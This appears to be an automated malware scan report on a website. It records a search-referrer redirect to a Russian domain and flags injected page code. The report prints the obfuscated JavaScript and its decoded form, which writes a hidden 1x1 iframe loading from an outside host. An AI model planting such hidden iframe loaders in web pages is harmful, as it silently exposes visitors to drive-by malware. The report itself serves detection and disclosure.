Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://samglattstein.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: samglattstein.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 11 Sep 2014 02:23:22 GMT Location: http://sertwey.ru/ Server: Apache Content-Length: 293 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://samglattstein.com/ | 200 OK Content-Length: 9547 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) varRcgpr=document;functionrBDCA(LHPHz){varNAVoM="",nkaMh=0;for(nkaMh=LHPHz.length-1;nkaMh>=0;nkaMh--){NAVoM+=LHPHz.charAt(nkaMh);}returnNAVoM;}functionQmnLe(){document.write("<style>.rDaLm{width:0%;height:0%;border:none;}</style>");varnMeSc="<iframe/**/name=\"2\" id=\"YnMkb\" src=\"$\" class=\"rDaLm\"></iframe>";varTXAGb=nMeSc.replace(/[\+$]/g,iSqVb(".74.6c.75.61.66.65.64.3f.69.67.63.2e.6e.69.2f.7a.69.62.2e.73.66.66.61.72.74.2f.2f.3a.70.74.74.68"));returnTXAGb;}Rcgpr.writeln(QmnLe());functioniSqVb(ylybP){ylybP=ylybP.replace(/[\.]/g,"%");ylybP=unescape(ylybP);returnrBDCA(ylybP);} Decoded script: document['w8242r6099i1334t1169e70782216'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://bicodehl.com/ghost2.php\'></iframe>'); document['w8242r6099i1334t1169e70782216'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://bicodehl.com/ghost2.php\'></iframe>'); /*** called setTimeout with document['w8242r6099i1334t1169e70782216'.replace(/[0-9]/g,'')]('<iframe width=1 height=1 border=0 frameborder=0 src=\'http://bicodehl.com/ghost2.php\'></iframe>');, 246 */ <iframe width=1 height=1 border=0 frameborder=0 src='http://bicodehl.com/ghost2.php'></iframe> Antivirus reports:
| ||
http://nt010.cn/E/J.JS | 404 Not Found Content-Length: 13012 Content-Type: text/html | clean |
http://a1.dnbizcdn.com/js/b/client20130325new.js | 200 OK Content-Length: 2048 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/domain_parking.js | 200 OK Content-Length: 162720 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/ci.js | 200 OK Content-Length: 5760 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: application/x-javascript | clean |
http://a1.dnbizcdn.com/js/b/caf.js | 200 OK Content-Length: 8900 Content-Type: application/x-javascript | clean |
http://nt010.cn/test404page.js | 404 Not Found Content-Length: 12997 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=samglattstein.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://samglattstein.com/
Result: samglattstein.com is not infected or malware details are not published yet.
Result: samglattstein.com is not infected or malware details are not published yet.